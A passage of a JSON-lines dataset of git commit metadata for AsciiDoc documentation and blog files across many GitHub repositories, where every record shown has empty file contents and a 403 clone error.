unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d363acc602718c085b5b3729526502335fb005f6","subject":"Add release process documentation","message":"Add release process documentation","repos":"OmniLayer\/OmniJ,OmniLayer\/OmniJ,OmniLayer\/OmniJ","old_file":"adoc\/release-process.adoc","new_file":"adoc\/release-process.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OmniLayer\/OmniJ.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0b14664a8c834b2a812884087b18ab21e6aabd96","subject":"Fix typos in reference (#3979)","message":"Fix typos in reference 
(#3979)\n\n","repos":"fhanik\/spring-security,thomasdarimont\/spring-security,jgrandja\/spring-security,pwheel\/spring-security,mdeinum\/spring-security,fhanik\/spring-security,SanjayUser\/SpringSecurityPro,olezhuravlev\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,ollie314\/spring-security,wkorando\/spring-security,rwinch\/spring-security,thomasdarimont\/spring-security,rwinch\/spring-security,mdeinum\/spring-security,djechelon\/spring-security,kazuki43zoo\/spring-security,SanjayUser\/SpringSecurityPro,pwheel\/spring-security,fhanik\/spring-security,ollie314\/spring-security,olezhuravlev\/spring-security,rwinch\/spring-security,pwheel\/spring-security,SanjayUser\/SpringSecurityPro,olezhuravlev\/spring-security,eddumelendez\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,fhanik\/spring-security,jgrandja\/spring-security,fhanik\/spring-security,ollie314\/spring-security,spring-projects\/spring-security,kazuki43zoo\/spring-security,kazuki43zoo\/spring-security,kazuki43zoo\/spring-security,eddumelendez\/spring-security,djechelon\/spring-security,jgrandja\/spring-security,djechelon\/spring-security,SanjayUser\/SpringSecurityPro,olezhuravlev\/spring-security,thomasdarimont\/spring-security,SanjayUser\/SpringSecurityPro,wkorando\/spring-security,djechelon\/spring-security,jgrandja\/spring-security,mdeinum\/spring-security,kazuki43zoo\/spring-security,eddumelendez\/spring-security,wkorando\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,djechelon\/spring-security,ollie314\/spring-security,olezhuravlev\/spring-security,thomasdarimont\/spring-security,rwinch\/spring-security,pwheel\/spring-security,eddumelendez\/spring-security,jgrandja\/spring-security,wkorando\/spring-security,mdeinum\/spring-security,jgrandja\/spring-security,fhanik\/spring-security,thomasdarimont\/spring-security,eddumelendez\/spring-security,pwheel\/spring-security,spring-projects\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/index.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fhanik\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"59a2cbbcf1ab4ba2e0226e310d3cbcc8212285f9","subject":"added asciidoc mark up for lists to improve readability","message":"added asciidoc mark up for lists to improve readability","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/dev_env.adoc","new_file":"docs\/dev_env.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b49165cc4a9d067b8a50e92ffc84033cf9c96b15","subject":"Create common-installGrails5.adoc","message":"Create common-installGrails5.adoc","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-installGrails5.adoc","new_file":"src\/main\/docs\/common-installGrails5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b09398cb2afbe79b55de45a8010bcda7dacd65e3","subject":"Adding a 
Gradle Plugin common snippet","message":"Adding a Gradle Plugin common snippet\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/commmon-addingAGradlePlugin.adoc","new_file":"src\/main\/docs\/commmon-addingAGradlePlugin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d3302f1c77b54cf2b26ccae56ba7771b64eba4b8","subject":"\u4f5c\u696d\u306e\u9032\u3081\u65b9\u306bgit\u30b3\u30de\u30f3\u30c9\u8ffd\u8a18","message":"\u4f5c\u696d\u306e\u9032\u3081\u65b9\u306bgit\u30b3\u30de\u30f3\u30c9\u8ffd\u8a18\n","repos":"TraningManagementSystem\/tms,TraningManagementSystem\/tms,TraningManagementSystem\/tms,TraningManagementSystem\/tms","old_file":"docs\/Sec510_Dev_Policy\/Sec510_Dev_Policy_howtowork.adoc","new_file":"docs\/Sec510_Dev_Policy\/Sec510_Dev_Policy_howtowork.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TraningManagementSystem\/tms.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1d3b614abd7d2e036d5c7270e5f65cc2b8ae70d3","subject":"Update 2016-06-11-Trabajando-con-Docker.adoc","message":"Update 2016-06-11-Trabajando-con-Docker.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"04f9734fdd5a31630ed7b1f0948dae46905a8344","subject":"Update 2016-08-09-TP.adoc","message":"Update 2016-08-09-TP.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-09-TP.adoc","new_file":"_posts\/2016-08-09-TP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ad6b469bd9765834699b9429521662ea99585db","subject":"Update 2015-02-20-Django-MongoDB-Engine.adoc","message":"Update 2015-02-20-Django-MongoDB-Engine.adoc","repos":"theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io","old_file":"_posts\/2015-02-20-Django-MongoDB-Engine.adoc","new_file":"_posts\/2015-02-20-Django-MongoDB-Engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/theofilis\/theofilis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58f2a58bc40772a83214fbffbc16f6a5b6bc99b0","subject":"Update 2016-06-11-Trabajando-con-Docker.adoc","message":"Update 
2016-06-11-Trabajando-con-Docker.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"411a2d07abd41ad27ce640270c635b7ec37277e1","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47084b5ef0d42760b613548347721d4a4bd56714","subject":"Update 2017-08-14-Cloud-Spanner.adoc","message":"Update 2017-08-14-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-14-Cloud-Spanner.adoc","new_file":"_posts\/2017-08-14-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"542c20266331adc32f1632031da6e185d6fa6009","subject":"added git revert doc","message":"added git revert doc\n","repos":"uclouvain\/osis,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis_louvain","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"e8a78df555b259fd73f216540994d87ff8d71138","subject":"Fix markdown formatting (#28392)","message":"Fix markdown formatting 
(#28392)\n\n","repos":"s1monw\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,scottsom\/elasticsearch,robin13\/elasticsearch,qwerty4030\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,s1monw\/elasticsearch,kalimatas\/elasticsearch,uschindler\/elasticsearch,rajanm\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,scottsom\/elasticsearch,gfyoung\/elasticsearch,s1monw\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,qwerty4030\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch,kalimatas\/elasticsearch,s1monw\/elasticsearch,scorpionvicky\/elasticsearch,kalimatas\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,scottsom\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,scottsom\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,s1monw\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,rajanm\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,qwerty4030\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,scottsom\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,qwerty4030\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch","old_file":"docs\/reference\/ingest\/ingest-node.asciidoc","new_file":"docs\/reference\/ingest\/ingest-node.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"136b72bf8725b1ee4b005b14b03b0c15b80be8f1","subject":"Added README in asciidoc format.","message":"Added README in asciidoc format.\n","repos":"blajzer\/syrup,blajzer\/syrup","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blajzer\/syrup.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac043f57ac4a1da4b897b5b109562b57515c08f4","subject":"Update 2014-07-15-Episode-9-Ambiance.adoc","message":"Update 2014-07-15-Episode-9-Ambiance.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2014-07-15-Episode-9-Ambiance.adoc","new_file":"_posts\/2014-07-15-Episode-9-Ambiance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"878165fda44364883e840b0373ea36a7c048bf24","subject":"Update 2016-04-06-Rompiendo-sistemas.adoc","message":"Update 
2016-04-06-Rompiendo-sistemas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Rompiendo-sistemas.adoc","new_file":"_posts\/2016-04-06-Rompiendo-sistemas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9517c8ce7826b623e94409bb8f58bd73437dabf","subject":"Update 2016-06-23-Json-web-Token-JWT.adoc","message":"Update 2016-06-23-Json-web-Token-JWT.adoc","repos":"devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io","old_file":"_posts\/2016-06-23-Json-web-Token-JWT.adoc","new_file":"_posts\/2016-06-23-Json-web-Token-JWT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devkamboj\/devkamboj.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95835a8f0ec04dd89cec1ed3bbae6f994ce639e7","subject":"Added xmlRpc dataformat docs to Gitbook","message":"Added xmlRpc dataformat docs to Gitbook\n","repos":"RohanHart\/camel,anton-k11\/camel,rmarting\/camel,JYBESSON\/camel,akhettar\/camel,JYBESSON\/camel,kevinearls\/camel,sverkera\/camel,pax95\/camel,nboukhed\/camel,nicolaferraro\/camel,neoramon\/camel,alvinkwekel\/camel,tlehoux\/camel,tadayosi\/camel,apache\/camel,RohanHart\/camel,sirlatrom\/camel,punkhorn\/camel-upstream,neoramon\/camel,jkorab\/camel,veithen\/camel,apache\/camel,ullgren\/camel,NickCis\/camel,sabre1041\/camel,sirlatrom\/camel,hqstevenson\/camel,jonmcewen\/camel,allancth\/camel,cunningt\/camel,tkopczynski\/camel,zregvart\/camel,bgaudaen\/camel,rmarting\/camel,rmarting\/camel,hqstevenson\/camel,lburgazzoli\/apache-camel,lburgazzoli\/camel,veithen\/camel,anoordover\/camel,yuruki\/camel,drsquidop\/camel,adessaigne\/camel,onders86\/camel,yuruki\/camel,CodeSmell\/camel,neoramon\/camel,onders86\/camel,anoordover\/camel,mcollovati\/camel,tkopczynski\/camel,yuruki\/camel,bhaveshdt\/camel,anton-k11\/camel,veithen\/camel,isavin\/camel,hqstevenson\/camel,ullgren\/camel,pmoerenhout\/camel,ssharma\/camel,onders86\/camel,sabre1041\/camel,chirino\/camel,akhettar\/camel,RohanHart\/camel,lburgazzoli\/apache-camel,sirlatrom\/camel,gautric\/camel,mgyongyosi\/camel,nicolaferraro\/camel,snurmine\/camel,dmvolod\/camel,snurmine\/camel,tlehoux\/camel,pkletsko\/camel,acartapanis\/camel,scranton\/camel,alvinkwekel\/camel,gautric\/camel,scranton\/camel,tadayosi\/camel,driseley\/camel,onders86\/camel,onders86\/camel,allancth\/camel,punkhorn\/camel-upstream,yuruki\/camel,tdiesler\/camel,tdiesler\/camel,ssharma\/camel,bgaudaen\/camel,Fabryprog\/camel,bgaudaen\/camel,jarst\/camel,bhaveshdt\/camel,prashant2402\/camel,sabre1041\/camel,prashant2402\/camel,salikjan\/camel,dmvolod\/camel,acartapanis\/camel,pkletsko\/camel,drsquidop\/camel,acartapanis\/camel,mgyongyosi\/camel,tdiesler\/camel,nicolaferraro\/camel,acartapanis\/camel,anton-k11\/camel,tlehoux\/camel,jarst\/camel,jamesnetherton\/camel,w4tson\/camel,anoordover\/camel,akhettar\/camel,jonmcewen\/camel,ullgren\/camel,rmarting\/camel,curso007\/camel,chirino\/camel,w4tson\/camel,cunningt\/camel,bgaudaen\/camel,driseley\/camel,christophd\/camel,nboukhed\/camel,davidkarlsen\/camel,davidkarlsen\/camel,DariusX\/camel,jamesnetherton\/camel,isavin\/camel,tadayosi\/camel,gnodet\/camel,pmoerenh
out\/camel,davidkarlsen\/camel,gilfernandes\/camel,curso007\/camel,jamesnetherton\/camel,curso007\/camel,adessaigne\/camel,driseley\/camel,apache\/camel,davidkarlsen\/camel,kevinearls\/camel,mgyongyosi\/camel,bgaudaen\/camel,prashant2402\/camel,tdiesler\/camel,tkopczynski\/camel,chirino\/camel,jonmcewen\/camel,pax95\/camel,jarst\/camel,akhettar\/camel,adessaigne\/camel,akhettar\/camel,Thopap\/camel,sabre1041\/camel,alvinkwekel\/camel,sabre1041\/camel,jamesnetherton\/camel,adessaigne\/camel,yuruki\/camel,sabre1041\/camel,kevinearls\/camel,ssharma\/camel,NickCis\/camel,isavin\/camel,pkletsko\/camel,snurmine\/camel,dmvolod\/camel,jkorab\/camel,tadayosi\/camel,cunningt\/camel,CodeSmell\/camel,snurmine\/camel,NickCis\/camel,jonmcewen\/camel,sirlatrom\/camel,tdiesler\/camel,anoordover\/camel,ssharma\/camel,hqstevenson\/camel,snurmine\/camel,driseley\/camel,nikhilvibhav\/camel,pkletsko\/camel,tlehoux\/camel,sverkera\/camel,anton-k11\/camel,neoramon\/camel,lburgazzoli\/apache-camel,nboukhed\/camel,driseley\/camel,pax95\/camel,sverkera\/camel,lburgazzoli\/camel,mgyongyosi\/camel,lburgazzoli\/camel,jarst\/camel,hqstevenson\/camel,anton-k11\/camel,ssharma\/camel,allancth\/camel,veithen\/camel,isavin\/camel,lburgazzoli\/camel,kevinearls\/camel,jkorab\/camel,christophd\/camel,nikhilvibhav\/camel,curso007\/camel,akhettar\/camel,objectiser\/camel,JYBESSON\/camel,nikhilvibhav\/camel,chirino\/camel,Fabryprog\/camel,mcollovati\/camel,lburgazzoli\/apache-camel,gilfernandes\/camel,acartapanis\/camel,cunningt\/camel,christophd\/camel,CodeSmell\/camel,nboukhed\/camel,RohanHart\/camel,dmvolod\/camel,curso007\/camel,tkopczynski\/camel,veithen\/camel,RohanHart\/camel,salikjan\/camel,chirino\/camel,anoordover\/camel,gnodet\/camel,sirlatrom\/camel,gilfernandes\/camel,tlehoux\/camel,drsquidop\/camel,isavin\/camel,pax95\/camel,anoordover\/camel,NickCis\/camel,neoramon\/camel,DariusX\/camel,snurmine\/camel,tadayosi\/camel,zregvart\/camel,NickCis\/camel,pmoerenhout\/camel,jarst\/camel,bhaveshdt\/camel,w4tson\/camel,mcollovati\/camel,sverkera\/camel,prashant2402\/camel,punkhorn\/camel-upstream,kevinearls\/camel,sverkera\/camel,nboukhed\/camel,nboukhed\/camel,gilfernandes\/camel,DariusX\/camel,anton-k11\/camel,objectiser\/camel,mgyongyosi\/camel,RohanHart\/camel,apache\/camel,drsquidop\/camel,nicolaferraro\/camel,gautric\/camel,CodeSmell\/camel,jkorab\/camel,cunningt\/camel,gilfernandes\/camel,gautric\/camel,onders86\/camel,pmoerenhout\/camel,gautric\/camel,scranton\/camel,NickCis\/camel,kevinearls\/camel,jarst\/camel,hqstevenson\/camel,jonmcewen\/camel,mgyongyosi\/camel,cunningt\/camel,bgaudaen\/camel,scranton\/camel,gnodet\/camel,drsquidop\/camel,christophd\/camel,dmvolod\/camel,jkorab\/camel,tkopczynski\/camel,isavin\/camel,chirino\/camel,JYBESSON\/camel,lburgazzoli\/camel,tadayosi\/camel,Thopap\/camel,tkopczynski\/camel,nikhilvibhav\/camel,acartapanis\/camel,objectiser\/camel,sirlatrom\/camel,DariusX\/camel,jamesnetherton\/camel,punkhorn\/camel-upstream,bhaveshdt\/camel,veithen\/camel,bhaveshdt\/camel,w4tson\/camel,jkorab\/camel,driseley\/camel,alvinkwekel\/camel,pmoerenhout\/camel,w4tson\/camel,allancth\/camel,allancth\/camel,prashant2402\/camel,dmvolod\/camel,pmoerenhout\/camel,bhaveshdt\/camel,zregvart\/camel,JYBESSON\/camel,scranton\/camel,Thopap\/camel,christophd\/camel,Thopap\/camel,sverkera\/camel,adessaigne\/camel,neoramon\/camel,gnodet\/camel,lburgazzoli\/apache-camel,allancth\/camel,jamesnetherton\/camel,pax95\/camel,apache\/camel,rmarting\/camel,curso007\/camel,Fabryprog\/camel,tlehoux\/camel,pax95\/camel,Th
opap\/camel,ullgren\/camel,lburgazzoli\/camel,pkletsko\/camel,mcollovati\/camel,apache\/camel,scranton\/camel,JYBESSON\/camel,gautric\/camel,pkletsko\/camel,rmarting\/camel,christophd\/camel,gilfernandes\/camel,Fabryprog\/camel,prashant2402\/camel,drsquidop\/camel,adessaigne\/camel,tdiesler\/camel,zregvart\/camel,jonmcewen\/camel,yuruki\/camel,w4tson\/camel,Thopap\/camel,gnodet\/camel,ssharma\/camel,lburgazzoli\/apache-camel,objectiser\/camel","old_file":"components\/camel-xmlrpc\/src\/main\/docs\/xmlrpc-dataformat.adoc","new_file":"components\/camel-xmlrpc\/src\/main\/docs\/xmlrpc-dataformat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4dd0772cfeedaf648f2bb15d13beae8e93ac1cf2","subject":"Publish 2099-1-1-Puzzle-2-Hack-Me-If-You-Can.adoc","message":"Publish 2099-1-1-Puzzle-2-Hack-Me-If-You-Can.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2099-1-1-Puzzle-2-Hack-Me-If-You-Can.adoc","new_file":"2099-1-1-Puzzle-2-Hack-Me-If-You-Can.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2227574e49380c212bcffe6d8e18ff84e1db4639","subject":"Update 2017-02-21.adoc","message":"Update 2017-02-21.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-21.adoc","new_file":"_posts\/2017-02-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd5bae819d5f7ab350d5bc8fde0a86dd7e967c9d","subject":"y2b create post RIP Steve Jobs - Your message was clear.","message":"y2b create post RIP Steve Jobs - Your message was clear.","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-06-RIP-Steve-Jobs--Your-message-was-clear.adoc","new_file":"_posts\/2011-10-06-RIP-Steve-Jobs--Your-message-was-clear.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f4e43a21ae4b1d87274a3041404f8211281a265","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"719ea8fcfd5197573096c9fb038df34ad1745227","subject":"Update 2017-02-03-What-Git-Lab-Left-Us.adoc","message":"Update 
2017-02-03-What-Git-Lab-Left-Us.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65c8d96a750866bfb460e99d5674660e9b94579a","subject":"Update 2015-09-30-Multithreading-and-Parallel-Programming.adoc","message":"Update 2015-09-30-Multithreading-and-Parallel-Programming.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-30-Multithreading-and-Parallel-Programming.adoc","new_file":"_posts\/2015-09-30-Multithreading-and-Parallel-Programming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0aea329e399b037d8d3951eb424837416c33ac26","subject":"y2b create post This Thing = Next Level Portable Gaming","message":"y2b create post This Thing = Next Level Portable Gaming","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-21-This-Thing--Next-Level-Portable-Gaming.adoc","new_file":"_posts\/2016-08-21-This-Thing--Next-Level-Portable-Gaming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9e2f5fbd3801d550b77c0ef16e120e3ab9ab3a3","subject":"Update 2015-11-06-Homens-Libertem-se.adoc","message":"Update 2015-11-06-Homens-Libertem-se.adoc","repos":"homenslibertemse\/homenslibertemse.github.io,homenslibertemse\/homenslibertemse.github.io,homenslibertemse\/homenslibertemse.github.io","old_file":"_posts\/2015-11-06-Homens-Libertem-se.adoc","new_file":"_posts\/2015-11-06-Homens-Libertem-se.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/homenslibertemse\/homenslibertemse.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6974989e41a57ff556a703f8848a6fcb5df3709e","subject":"Delete the file at '_posts\/2017-06-01-Naming-Conventions.adoc'","message":"Delete the file at '_posts\/2017-06-01-Naming-Conventions.adoc'","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-06-01-Naming-Conventions.adoc","new_file":"_posts\/2017-06-01-Naming-Conventions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8208a2854da66d6798963e18fd226b9e131cd10c","subject":"Update 2017-10-03-new-blog-is-online.adoc","message":"Update 
2017-10-03-new-blog-is-online.adoc","repos":"laibaogo\/hubpress.io,laibaogo\/hubpress.io,laibaogo\/hubpress.io,laibaogo\/hubpress.io","old_file":"_posts\/2017-10-03-new-blog-is-online.adoc","new_file":"_posts\/2017-10-03-new-blog-is-online.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/laibaogo\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0d7b09e12bf3f23f77fb3e421484cd9f47ce931","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92b811527f4e5298d6576bc4af373d94d61b40de","subject":"Much draft notes about Papyrus 